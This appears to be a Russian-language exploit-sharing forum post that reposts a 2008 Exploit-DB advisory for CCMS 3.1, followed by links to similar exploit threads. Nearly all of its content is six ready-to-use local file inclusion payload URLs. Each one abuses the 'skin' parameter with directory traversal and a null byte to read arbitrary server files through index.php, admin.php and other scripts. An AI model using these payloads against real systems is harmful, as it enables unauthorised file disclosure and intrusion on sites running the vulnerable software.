Exploit CCMS 3.1 - 'skin' Local File Inclusion

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6663
Проверка EDB
  1. Пройдено
Автор
SIRGOD
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-4526
Дата публикации
2008-10-03
Код: 
############################################################################################
[+] CCMS 3.1 (skin) Multiple Local File Inclusion Vulnerabilities
[+] Discovered By SirGod
[+] wWw.MorTal-TeaM.OrG
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
############################################################################################

[+] Download Script :

   http://rapidshare.com/files/94804716/CCMS_v3.1_by_Mikel_Dean.rar

[+] Local File Inclusion

--------------------------------------------------------------------------------------------

   PoC 1 :

      http://[target]/[path]/index.php?skin=[Local File]%00

   Example 1 :

      http://127.0.0.1/path/index.php?skin=../../../../autoexec.bat%00


--------------------------------------------------------------------------------------------

   PoC 2 :

      http://[target]/[path]/forums.php?skin=[Local File]%00

   Example 2 :

      http://127.0.0.1/path/forums.php?skin=../../../../autoexec.bat%00


--------------------------------------------------------------------------------------------

   PoC 3 :

      http://[target]/[path]/admin.php?skin=[Local File]%00

   Example 3 :

      http://127.0.0.1/path/admin.php?skin=../../../../autoexec.bat%00

--------------------------------------------------------------------------------------------

   PoC 4 :

      http://[target]/[path]/header.php?skin=[Local File]%00

   Example 4 :

      http://127.0.0.1/path/header.php?skin=../../../../autoexec.bat%00

--------------------------------------------------------------------------------------------

   PoC 5 :

      http://[target]/[path]/pages/story.php?skin=[Local File]%00

   Example 5 :

      http://127.0.0.1/path/pages/story.php?skin=../../../../../autoexec.bat%00

--------------------------------------------------------------------------------------------

   PoC 6 :

      http://[target]/[path]/pages/poll.php?skin=[Local File]%00

   Example 6 :

      http://127.0.0.1/path/pages/poll.php?skin=../../../../../autoexec.bat%00

--------------------------------------------------------------------------------------------

############################################################################################

# milw0rm.com [2008-10-03]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit CCMS 3.1 Demo - SQL Injection
Ответы
0
Просмотры
257
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Pinnacle ShowCenter 1.51 - Web Interface Skin Denial of Service
Ответы
0
Просмотры
390
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit DataLife Engine 8.3 - '/engine/ajax/addcomments.php?_REQUEST[skin]' Remote File Inclusion
Ответы
0
Просмотры
388
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit netjukebox 4.01B/5.25 - 'skin' Cross-Site Scripting
Ответы
0
Просмотры
355
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Windows Media Player 7.1 - Skin File Code Execution
Ответы
0
Просмотры
341
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Cedric Email Reader 0.2/0.3 - Skin Configuration Script Remote File Inclusion
Ответы
0
Просмотры
339
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Live for Speed - Skin Name Buffer Overflow
Ответы
0
Просмотры
350
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit NPlayer - '.dat Skin' Local Heap Overflow (PoC)
Ответы
0
Просмотры
293
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit DivX Player 2.6 - '.Skin' File Directory Traversal
Ответы
0
Просмотры
295
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (SEH)
Ответы
0
Просмотры
279
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу